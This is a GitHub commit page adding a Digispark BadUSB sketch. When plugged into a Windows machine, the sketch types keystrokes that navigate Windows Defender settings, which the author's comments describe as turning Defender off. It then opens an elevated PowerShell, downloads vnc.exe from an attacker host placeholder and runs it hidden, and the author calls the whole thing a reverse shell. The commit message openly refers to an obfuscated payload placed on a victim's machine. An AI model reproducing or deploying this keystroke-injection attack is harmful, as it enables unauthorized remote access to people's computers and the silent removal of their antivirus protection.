Skip to content

Commit 7d117d6

Browse files
EndlssNightmareEndlssNightmare
authored
Create Metasploit-Revshell.ino
U can change the delays on script. I'm using like this because i obfuscated the payload on a funtional exe archive, so it takes longer to download on victims machine.
1 parent 23ea003 commit 7d117d6

File tree

1 file changed

+79
-0
lines changed

1 file changed

+79
-0
lines changed

Metasploit-Revshell/DirectROOT/Metasploit-Revshell.ino

Lines changed: 79 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,79 @@
1+
#include "DigiKeyboard.h"
2+
#include "DigiKeyboardPtBr.h"
3+
4+
void setup() {
5+
pinMode(0,OUTPUT);
6+
pinMode(1,OUTPUT);
7+
}
8+
9+
void loop() {
10+
pisca_led(100);
11+
//Desliga o Windows Defender
12+
DigiKeyboard.delay(1000);
13+
DigiKeyboard.sendKeyStroke(KEY_M, MOD_GUI_LEFT); //Minimiza todas as janelas abertas
14+
DigiKeyboard.delay(1500);
15+
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //Abre o executar
16+
DigiKeyboard.delay(1500);
17+
DigiKeyboard.println("Windowsdefender://threat/"); //Abre o windows defender pelo executar
18+
DigiKeyboard.delay(1000);
19+
DigiKeyboard.print("\t\t\t\t"); //4 TAB
20+
DigiKeyboard.delay(1000);
21+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
22+
DigiKeyboard.delay(500);
23+
DigiKeyboard.sendKeyStroke(KEY_SPACE);
24+
DigiKeyboard.delay(500);
25+
DigiKeyboard.print("\t\t"); //2 TAB
26+
DigiKeyboard.delay(500);
27+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
28+
DigiKeyboard.delay(1000);
29+
DigiKeyboard.print("\t\t\t\t"); //4 TAB
30+
DigiKeyboard.delay(500);
31+
DigiKeyboard.sendKeyStroke(KEY_SPACE);
32+
DigiKeyboard.delay(1000);
33+
DigiKeyboard.print("\t\t\t\t"); //4 TAB
34+
DigiKeyboard.delay(500);
35+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
36+
DigiKeyboard.delay(500);
37+
DigiKeyboard.sendKeyStroke(KEY_SPACE);
38+
DigiKeyboard.delay(500);
39+
DigiKeyboard.print("\t\t"); //2 TAB
40+
DigiKeyboard.delay(500);
41+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
42+
DigiKeyboard.delay(1000);
43+
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT); //Fecha a janela
44+
DigiKeyboard.delay(5000);
45+
//Reverse shell
46+
DigiKeyboard.sendKeyStroke(0);
47+
DigiKeyboard.delay(500);
48+
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
49+
DigiKeyboard.delay(500);
50+
DigiKeyboard.print("powershell start-process powershell -verb runas");
51+
DigiKeyboard.delay(500);
52+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
53+
DigiKeyboard.delay(3000);
54+
DigiKeyboard.print("\t\t");
55+
DigiKeyboard.delay(500);
56+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
57+
DigiKeyboard.delay(1000);
58+
DigiKeyboard.println("Invoke-WebRequest -Uri http://YOURIP/vnc.exe -OutFile vnc.exe");
59+
DigiKeyboard.delay(700);
60+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
61+
DigiKeyboard.delay(12000);
62+
DigiKeyboard.println("powershell -windowstyle hidden start ./vnc.exe");
63+
DigiKeyboard.delay(1000);
64+
DigiKeyboard.sendKeyStroke(KEY_ENTER);
65+
//
66+
pisca_led(1000);
67+
for(;;){ /*empty*/ }
68+
}
69+
70+
void pisca_led(int velocidade){
71+
for (int inicio =1; inicio <= 10; inicio ++) {
72+
digitalWrite(0, HIGH);
73+
digitalWrite(1, HIGH);
74+
DigiKeyboardPtBr.delay(velocidade);
75+
digitalWrite(0, LOW);
76+
digitalWrite(1, LOW);
77+
DigiKeyboardPtBr.delay(velocidade);
78+
}
79+
}

0 commit comments

Comments
 (0)